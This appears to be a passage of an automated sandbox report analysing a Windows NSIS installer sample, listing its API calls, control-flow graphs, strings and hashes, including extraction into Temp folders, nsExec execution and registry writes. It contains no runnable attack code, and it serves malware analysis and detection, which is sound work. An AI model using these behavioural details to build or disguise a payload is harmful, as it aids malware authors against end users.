                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                • API String ID: 1975747703-3894366081
                                • Opcode ID: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                                • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                • Opcode Fuzzy Hash: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                                • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                                 Control-flow Graph (function starting at 402f31; rendered graph not reproduced in text)
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402F42
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MPkM9Dd99B.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                  • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                  • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MPkM9Dd99B.exe,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MPkM9Dd99B.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                • API String ID: 2803837635-1816034078
                                • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                                 Control-flow Graph (function starting at 406320; rendered graph not reproduced in text)
                                APIs
                                • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00406452
                                • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00000000), ref: 00406468
                                • SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000), ref: 004064C7
                                • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000), ref: 004064D0
                                • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000), ref: 004064F4
                                • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00000000,00422E40,755723A0), ref: 00406546
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                • String ID: T@$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\$Software\Microsoft\Windows\CurrentVersion$Under i$$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4024019347-636480903
                                • Opcode ID: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                                • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                • Opcode Fuzzy Hash: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                                • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                                 Control-flow Graph (function starting at 40177e; rendered graph not reproduced in text)
                                APIs
                                • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede,00000000,00000000,00000031), ref: 004017BD
                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede,00000000,00000000,00000031), ref: 004017E7
                                  • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                  • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                  • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede$C:\Users\user\AppData\Local\Temp\nsz930C.tmp$C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll$ExecToStack$Under i$
                                • API String ID: 1941528284-4268067446
                                • Opcode ID: 699483246fe71b07c72269ff801a32e29f6d0f6d2c6e80c57e7fc8c9a70540fa
                                • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                • Opcode Fuzzy Hash: 699483246fe71b07c72269ff801a32e29f6d0f6d2c6e80c57e7fc8c9a70540fa
                                • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 650 4053d1-4053e6 651 40549c-4054a0 650->651 652 4053ec-4053fe 650->652 653 405400-405404 call 406320 652->653 654 405409-405415 lstrlenA 652->654 653->654 656 405432-405436 654->656 657 405417-405427 lstrlenA 654->657 659 405445-405449 656->659 660 405438-40543f SetWindowTextA 656->660 657->651 658 405429-40542d lstrcatA 657->658 658->656 661 40544b-40548d SendMessageA * 3 659->661 662 40548f-405491 659->662 660->659 661->662 662->651 663 405493-405496 662->663 663->651
                                APIs
                                • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                • lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\
                                • API String ID: 2531174081-1795491705
                                • Opcode ID: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                                • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                • Opcode Fuzzy Hash: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                                • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 664 403168-40317c 665 403185-40318e 664->665 666 40317e 664->666 667 403190 665->667 668 403197-40319c 665->668 666->665 667->668 669 4031ac-4031b9 call 40337a 668->669 670 40319e-4031a7 call 403390 668->670 674 403368 669->674 675 4031bf-4031c3 669->675 670->669 676 40336a-40336b 674->676 677 403313-403315 675->677 678 4031c9-403212 GetTickCount 675->678 681 403373-403377 676->681 679 403355-403358 677->679 680 403317-40331a 677->680 682 403370 678->682 683 403218-403220 678->683 686 40335a 679->686 687 40335d-403366 call 40337a 679->687 680->682 688 40331c 680->688 682->681 684 403222 683->684 685 403225-403233 call 40337a 683->685 684->685 685->674 697 403239-403242 685->697 686->687 687->674 698 40336d 687->698 691 40331f-403325 688->691 694 403327 691->694 695 403329-403337 call 40337a 691->695 694->695 695->674 701 403339-403345 call 405ec7 695->701 700 403248-403268 call 4067da 697->700 698->682 706 40330b-40330d 700->706 707 40326e-403281 GetTickCount 700->707 708 403347-403351 701->708 709 40330f-403311 701->709 706->676 710 403283-40328b 707->710 711 4032c6-4032c8 707->711 708->691 712 403353 708->712 709->676 713 403293-4032be MulDiv wsprintfA call 4053d1 710->713 714 40328d-403291 710->714 715 4032ca-4032ce 711->715 716 4032ff-403303 711->716 712->682 723 4032c3 713->723 714->711 714->713 717 4032d0-4032d7 call 405ec7 715->717 718 4032e5-4032f0 715->718 716->683 719 403309 716->719 724 4032dc-4032de 717->724 722 4032f3-4032f7 718->722 719->682 722->700 725 4032fd 722->725 723->711 724->709 726 4032e0-4032e3 724->726 725->682 726->722
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CountTick$wsprintf
                                • String ID: %A$... %d%%$@.B
                                • API String ID: 551687249-2309215229
                                • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 727 406647-406667 GetSystemDirectoryA 728 406669 727->728 729 40666b-40666d 727->729 728->729 730 40667d-40667f 729->730 731 40666f-406677 729->731 733 406680-4066b2 wsprintfA LoadLibraryExA 730->733 731->730 732 406679-40667b 731->732 732->733
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                • wsprintfA.USER32 ref: 00406697
                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%s.dll$UXTHEME$\
                                • API String ID: 2200240437-4240819195
                                • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 734 4020ca-4020d6 735 402191-402193 734->735 736 4020dc-4020f2 call 402c5e * 2 734->736 737 40230a-40230f call 401423 735->737 745 402101-40210f LoadLibraryExA 736->745 746 4020f4-4020ff GetModuleHandleA 736->746 744 402aea-402af9 737->744 748 402111-40211e GetProcAddress 745->748 749 40218a-40218c 745->749 746->745 746->748 751 402120-402126 748->751 752 40215d-402162 call 4053d1 748->752 749->737 753 402128-402134 call 401423 751->753 754 40213f-40215b 751->754 756 402167-40216a 752->756 753->756 765 402136-40213d 753->765 754->756 756->744 758 402170-402178 call 403a36 756->758 758->744 764 40217e-402185 FreeLibrary 758->764 764->744 765->756
                                APIs
                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                  • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                  • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                • String ID: Under i$
                                • API String ID: 2987980305-278772426
                                • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 766 401c53-401c73 call 402c3c * 2 771 401c75-401c7c call 402c5e 766->771 772 401c7f-401c83 766->772 771->772 774 401c85-401c8c call 402c5e 772->774 775 401c8f-401c95 772->775 774->775 778 401ce3-401d09 call 402c5e * 2 FindWindowExA 775->778 779 401c97-401cb3 call 402c3c * 2 775->779 791 401d0f 778->791 789 401cd3-401ce1 SendMessageA 779->789 790 401cb5-401cd1 SendMessageTimeoutA 779->790 789->791 792 401d12-401d15 790->792 791->792 793 402aea-402af9 792->793 794 401d1b 792->794 794->793
                                APIs
                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 797 4024a3-4024ca call 402c5e * 2 call 402cee 803 4024cf-4024d4 797->803 804 402aea-402af9 803->804 805 4024da-4024e4 803->805 807 4024f4-4024f7 805->807 808 4024e6-4024f3 call 402c5e lstrlenA 805->808 811 4024f9-40250d call 402c3c 807->811 812 40250e-402511 807->812 808->807 811->812 813 402522-402536 RegSetValueExA 812->813 814 402513-40251d call 403168 812->814 818 402538 813->818 819 40253b-402618 RegCloseKey 813->819 814->813 818->819 819->804
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000023,00000011,00000002), ref: 004024EE
                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 0040252E
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 00402612
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsz930C.tmp
                                • API String ID: 2655323295-3232026250
                                • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 822 405d0d-405d28 call 40628d call 405cb8 827 405d2a-405d2c 822->827 828 405d2e-405d3b call 406587 822->828 829 405d80-405d82 827->829 832 405d47-405d49 828->832 833 405d3d-405d41 828->833 835 405d5f-405d68 lstrlenA 832->835 833->827 834 405d43-405d45 833->834 834->827 834->832 836 405d6a-405d7e call 405c1f GetFileAttributesA 835->836 837 405d4b-405d52 call 406620 835->837 836->829 842 405d54-405d57 837->842 843 405d59-405d5a call 405c66 837->843 842->827 842->843 843->835
                                APIs
                                  • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                  • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405CC6
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405D60
                                • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 3248276644-3077356548
